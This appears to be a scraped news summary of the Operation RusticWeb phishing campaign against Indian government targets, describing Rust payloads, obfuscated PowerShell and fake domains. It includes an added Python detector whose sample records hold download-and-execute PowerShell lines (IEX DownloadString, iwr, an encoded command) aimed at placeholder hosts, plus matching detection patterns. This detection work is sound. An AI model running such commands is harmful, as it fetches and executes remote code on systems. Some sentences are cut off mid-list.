Hackers use PowerShell commands because they provide a powerful scripting environment on Windows systems, allowing them to stealthily execute malicious scripts and commands; the campaign described here, tracked as Operation RusticWeb, is one such case.
PowerShell's capabilities make it an attractive tool for gaining:-
Cybersecurity researchers at SEQRITE Labs recently identified Operation RusticWeb, in which threat actors use PowerShell commands to exfiltrate confidential documents.
The tactics of Operation RusticWeb overlap with those of Pakistan-linked APT groups like-
Threat actors are also shifting from compiled languages to the following languages for cross-platform compatibility and evasion:-
Golang malware examples include the Windows-based Warp, which uses a Telegram bot as its C2, and the Linux-based Ares RAT stager payload. The Rust-based payloads in Operation RusticWeb use malicious shortcuts and a fake AWES domain for data exfiltration.
Spear-phishing targets victims with an archive file named 'IPR 2023-24,' which triggers PowerShell to download scripts from rb[.
The PowerShell script sets up the paths used for payload downloads and uploads.
Extraction of the decoy PDF file triggers execution of the Rust-compiled EXE payload.
New December payloads target the Kailash Satyarthi Children's Foundation, indicating a focus on Indian government officials associated with children's foundations or societies.
In a December infection chain, maldocs were used together with PowerShell scripts for enumeration and exfiltration, omitting the Rust-based payloads.
Two fake domains and encrypted PowerShell scripts were involved.
The phishing maldoc initiates the infection with a VBA macro containing obfuscated, encrypted PowerShell commands.
Similar maldocs use modified PowerShell commands, converting numbers into the string 'PoWeRSHEll' when the document is opened.
Decryption of the PowerShell commands employs techniques akin to Emotet's, with slight variations.
Obfuscation uses Invoke-Obfuscation techniques to mask the IEX (Invoke-Expression) command trigger.
The decrypted PowerShell commands download decoy files and the next-stage script from the domains and execute them from the Downloads and Documents directories.
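As an added illustration (not code from the SEQRITE report or from gbhackers), the following Python triage function flags the obfuscation traits described above in PowerShell command-line or script-block log records: random-case 'PoWeRSHEll', a backtick-masked IEX trigger, char-code string building, -EncodedCommand payloads, web downloads, and drops into the Downloads or Documents folders. The sample records, the rule names and the example.invalid URLs are constructed for the example.

```python
import base64
import re

# Constructed sample command-line / script-block records, modelled on the behaviours the
# report describes. They are NOT indicators from the actual campaign.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')".encode("utf-16le")
).decode()
SAMPLE_COMMANDS = [
    "powershell.exe -File C:\\Scripts\\nightly-backup.ps1",
    "PoWeRSHEll -w hidden -ep bypass -c \"I`EX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2.ps1')\"",
    "powershell -c \"$p=[char]80+[char]111+[char]87; iwr http://example.invalid/d.pdf -OutFile $env:USERPROFILE\\Downloads\\IPR.pdf\"",
    "powershell -EncodedCommand " + ENCODED_PAYLOAD,
]

# Indicator name -> pattern. Backticks are stripped before matching: PowerShell treats
# them as an escape character, so I`EX runs exactly like IEX (a common Invoke-Obfuscation trick).
RULES = {
    "iex_trigger": re.compile(r"\biex\b|invoke-expression", re.I),
    "char_code_string_build": re.compile(r"\[char\]\s*\d+|\[char\[\]\]|\bchr\s*\(", re.I),
    "web_download": re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I),
    "drop_in_downloads_or_documents": re.compile(r"\\(downloads|documents)\\", re.I),
    "hidden_window_or_policy_bypass": re.compile(r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass", re.I),
}
ENCODED_ARG = re.compile(r"-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CANONICAL_CASE = {"powershell", "PowerShell", "POWERSHELL", "Powershell"}


def analyze(command: str, _depth: int = 0) -> list[str]:
    """Return the sorted indicator names found in one command line or script block."""
    text = command.replace("`", "")
    hits = {name for name, rx in RULES.items() if rx.search(text)}
    # Random-case binary names such as PoWeRSHEll are a hallmark of Invoke-Obfuscation output.
    for token in re.findall(r"\bpowershell\b", text, re.I):
        if token not in CANONICAL_CASE:
            hits.add("mixed_case_powershell")
    m = ENCODED_ARG.search(text)
    if m and _depth == 0:
        hits.add("encoded_command")
        try:  # -EncodedCommand carries base64 of UTF-16LE script: decode it and rescan once
            decoded = base64.b64decode(m.group(2)).decode("utf-16le", errors="ignore")
            hits.update("decoded:" + h for h in analyze(decoded, _depth + 1))
        except ValueError:
            pass
    return sorted(hits)


def is_suspicious(command: str, min_indicators: int = 2) -> bool:
    """Triage rule: two or more independent indicators warrant analyst review."""
    return len(analyze(command)) >= min_indicators


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(is_suspicious(cmd), analyze(cmd))
```

The same function can be pointed at Sysmon event 1 command lines or PowerShell 4104 script-block text; the threshold of two indicators keeps ordinary administrative use of -File or iwr alone from alerting.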
In the first scenario, the downloads occur from 'parichay. In,' and in the second scenario, the fake domain mimics 'parichay.
The new phishing campaign hits the Indian government, stealing secrets via Rust payloads, encrypted PowerShell, and OshiUpload. The fake domains used in the RusticWeb attack mimic government entities, and the operation is possibly tied to the Pakistan-linked APT threat.
This Cyber News was published on gbhackers.com. Publication date: Sat, 23 Dec 2023 10:13:05 +0000